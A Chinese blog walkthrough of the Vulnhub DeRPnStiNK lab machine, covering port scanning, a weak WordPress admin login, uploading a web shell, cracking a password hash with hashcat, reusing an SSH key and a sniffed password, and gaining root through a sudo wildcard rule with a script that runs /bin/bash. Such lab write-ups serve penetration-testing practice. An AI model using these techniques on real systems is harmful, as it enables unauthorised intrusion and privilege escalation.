Vulnhub:DeRPnStiNK渗透测试

最新推荐文章于 2024-04-17 21:17:18 发布
最新推荐文章于 2024-04-17 21:17:18 发布
阅读量995 收藏 3
点赞数 3
文章标签: 渗透测试 Vulnhub DeRPnStiNK WP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AtalantaDavis/article/details/88356482
版权

老规矩,用nmap扫一下。发现端口80、22、21、514。输入命令nmap -T4 -a -v xxx.xxx.xxx.xxx

Nmap scan report for xxx.xxx.xxx.xxx
Host is up (1.2s latency).
Not shown: 996 closed ports
PORTSTATESERVICE
21/tcpopenftp
22/tcpopenssh
80/tcpopenhttp
514/tcpfilteredshell

0xflag1

打开网页,访问端口80。查看源码,找到第一个flag。
flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

0xflag2

继续浏览网页源码,发现一个引用文件*/webnotes/info.txt*打开以后有一句话
@stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live,意思是要把映射域名。拿御剑扫一下。

ID地址HTTP响应
1xxx.xxx.xxx.xxx/robots.txt200
2xxx.xxx.xxx.xxx /weblog/301
3xxx.xxx.xxx.xxx/css301
4xxx.xxx.xxx.xxx/index.html200
5xxx.xxx.xxx.xxx/javascript301
6xxx.xxx.xxx.xxx/js301
7xxx.xxx.xxx.xxx/php301
8xxx.xxx.xxx.xxx/temporary/200

有一个xxx.xxx.xxx.xxx/weblog/,点击打开发现无法打开,并且网址变成http://derpnstink.local/weblog/

根据引用文件*/webnotes/info.txt*的提示,打开hosts文件最后一行加上xxx.xxx.xxx.xxx/derpnstink.local

再次打开http://derpnstink.local/weblog/,是一个wordpress博客的首页。管理员登陆网址是http://derpnstink.local/weblog/wp-login.php?loggedout=true,尝试弱口令登陆admin:admin,登陆成功。在管理员页面的发表文章上传一句话木马。用蚁剑连接,打开wp_config.php获取数据库用户名及密码root:mysql

打开xxx.xxx.xxx.xxx/php/phpmyadmin/,登陆数据库,在表wp_posts中找到第二个flag:
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

0xflag3

在数据库的wp_users表里找到的两个用户,用hashcat来破解。已知其中admin:admin。另一个账号unclestinky的密码是一串哈希值$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41。用hashcat工具来破译。在终端输入命令

root@kali:~# hashcat -a 0 -m 400 hash.txt fasttrack.txt --force --show

破解得到unclestinky:wedgie57,用账号登陆ftp服务器,登陆失败。

猜测账号错误,尝试stinky,登陆成功,打开以后找到地址ftp://xxx.xxx.xxx.xxx/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt下载密钥。

key.txt传入kali,终端输入ssh -i key.txt stinky@xxx.xxx.xxx.xxx,连接失败。

【错误提示】WORING:UNPROTECTED PRECVATE KEY FILE!

这里是说密钥文件权限不能为0777,0777权限太开放了,要求你的密钥文件不能被其它用户读取。
所以我们现在需要修改一下密钥文件权限。
在命令行输入chmod 700 key.txt即可。
再次连接,连接成功。

在桌面目录下找到第三个flag:

stinky@DeRPnStiNK:~Desktop/$ cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

###0xflag4

继续浏览其他目录,在documents文件夹下发现一个derpissues.pcap文件。

stinky@DeRPnStiNK:~Documents/$ ls
derpissues.pcap

在/ftp/files/network-logs路径下找到derpissues.txt

stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay

大意再说mrderp的登不上账号,stinky帮他修改了密码。可能derpissues.pcap文件就是derpissues.txt之中内容的流量包,用wireshark打开分析,在一条post请求里找到mrderp的密码:derpderpderpderpderpderpderp。

切换终端用户,输入密码

stinky@DeRPnStiNK:/$ su mrderp
password:
mrderp@DeRPnStiNK:/$

切换成功。

在mrderp用户的文件夹中找到helpdesk.log。
内容中有一个网址https://pastebin.com/rzk9wfgw

打开以后显示文本框:
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

检查sudo -l

mrderp@DeRPnStiNK:~$ sudo -l
[sudo] password for mrderp:
Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*

提示mrderp只有在/binaries/路径下文件名有derpy的文件可以使用sudo命令。
在这个目录创建derpy.sh并在里面写下/bin/bash。

mrderp@DeRPnStiNK:~/binaries$ echo "/bin/bash" >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ cat derpy.sh
/bin/bash

更改它的权限,并sudo执行,成功提权到root用户。

mrderp@DeRPnStiNK:~/binaries$ chmod 777 derpy.sh
mrderp@DeRPnStiNK:~/binaries$ ls
derpy.sh  derpysu
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
root@DeRPnStiNK:~/binaries# ls

在/root/desktop路径下找到最后一个flag:

root@DeRPnStiNK:/root/Desktop# cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
 
Congrats on rooting my first VulnOS!
 
Hit me up on twitter and let me know your thoughts!
 
@securekomodo
AtalantaDavis
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
小白的靶机-VulnHub-DerpNStink
wo41ge的博客
12-17 278
继续 继续 淦靶机 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 目标:得到root权限&找到四个flag.txt ok 开始操作了 开机界面就是个这 轻车熟路 的搞一下 找到了此次CTF目标计算机IP地址:192.168.120.136 综合信息 21端口--FTP 22端口--SSH 80端口--HTTP 优先看看80端口 直接访问 F12找一找 作者可太行了 这不就有了吗 flag1=52E37291AEDF6A46D7D
DerpNStink打靶思路详解(vulnhub),2024最新腾讯网络安全面试分享
最新发布
2401_84411822的博客
04-17 885
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
7-Vulnhub-DeRPnStiNK
尼德霍格007
07-19 266
VulnHub-DeRPnStiNK 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 目标:得到root权限&找到四个flag.txt 作者:尼德霍格007 时间:2021-7-19 信息收集 漏洞复现环境使用vmware虚拟机,kali机与靶机都使用NAT网络 kali扫描目标主机ip地址 nmap -sP 192.168.21.0/24 扫描靶机开放的1-10000的端口 nmap -A -p 1-10000 192.168.21.1
VULNHUB-DERPNSTINK: 1-靶机渗透
weixin_52374319的博客
05-13 782
VULNHUB-DERPNSTINK: 1-靶机渗透 靶机难度:中等(CTF) 靶场地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali攻击机ip:192.168.43.135 信息收集 arp-scan -l #扫描靶机ip 端口扫描 nmap -sC -sV -T4 192.168.43.73 可以看到21,22,80端口开放 访问80端口,呆呆二人组。。。。。 好干净的页面,看一下源代码找到第一个flag dirb目录爆破一
Vulnhub靶场篇:VulnHub2018_DeRPnStiNK
夜车星繁的博客
05-13 1216
靶场难度:中下难度 VMWARE虚拟机下搭建环境: 攻击机kali IP:192.168.223.136 攻击机win10:本机 靶 机IP:192.168.223.141 首先进行信息收集:
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
打靶练习vulnhub: stapler
03-28
打靶练习vulnhub: stapler
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
打靶练习vulnhub: my-cmsms
04-10
打靶练习vulnhub: my-cmsms
Vulnhub-DERPNSTINK: 1-靶机渗透学习
嗯嗯呐的博客
11-19 1927
靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中等(CTF) 靶机描述:这是基于Ubuntu的boot2root虚拟机。它已使用DHCP设置的网络接口在VMware Fusion和VMware Workstation12上进行了测试。它旨在模拟我在OSCP实验室中遇到的一些较早的机器,同时还带有一些较小的曲线球,但是没有什么花哨的。坚持经典的黑客方法,并列举所有内容! 目标:找到所有4个标志,最终将您带到完全root访问权限 作者:嗯嗯呐
VulnHub2018_DeRPnStiNK靶机总结
qq_45301512的博客
01-16 801
靶机下载地址:dl=0打开靶机,使用nmap扫描出靶机的ip和开放的所有端口可以看到,靶机开放了21端口,22端口和80端口遇到ftp的21端,我们先尝试ftp匿名登录,用户名anonymous,密码为空,发现无法ftp匿名登录那么我们然后先根据80端口打开网站,从网站入手,不行的话,在考虑ssh的爆破打开网站,并没有发现什么功能点,可以进行漏洞利用,那么开始信息收集,目录爆破一下使用dirb扫描出来,经过查看,发现一个新的网页。
Vulnhub:DerpNStink 1靶机
qq_43884092的博客
04-28 1104
wordpress后台弱口令,插件Slideshow任意文件上传
VulnHub靶机-DerpNStink
Slow_的博客
02-20 366
VulnHub靶机-DerpNStinkVulnHub靶机-DerpNStink一、信息收集功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 VulnHub靶机-DerpNStink 下载地址:https://www.vulnhub
Vulnhub:Derpnstink靶机渗透
m0_62008601的博客
12-26 1186
渗透学习
Vulnhub DeRKnStiNK
zhaji001
01-15 1141
简介 虚拟机下载: https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机: 使用Virtualbox虚拟机导入OVA 攻击机:kali linux  0x001  信息收集 nmap扫描网络找到VM ip地址  nmap -sn 192.168.1.100-254 Nmap scan report for 192.168.1.105 H...
VulnHub-DerpNStink:1渗透学习
我是小小白的博客
07-13 895
前言 靶机地址:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova 靶机难度:中级(CTF) 靶机发布日期:2018 年 2 月 9日 靶机描述:Derp 先生和 Stinky 叔叔是两位正在创办自己的公司 DerpNStink 的系统管理员。他们没有聘请合格的专业人士来建立他们的 IT 环境,而是决定将他们自己的系统组装在一起,该系统几乎准备好上线...... 目标:得到root权限&找到4个flag文件
OSCP Like Vulns Machines.pdf
10-06
这份文档汇集了各类VulnHub平台上的实战型虚拟机(VM)环境,这些虚拟机被精心设计,旨在供网络安全专业人员进行专业准备,提升渗透测试技能。Vulnhub是一个著名的漏洞实验室,提供了一系列挑战性的安全漏洞场景,供...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

AtalantaDavis

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值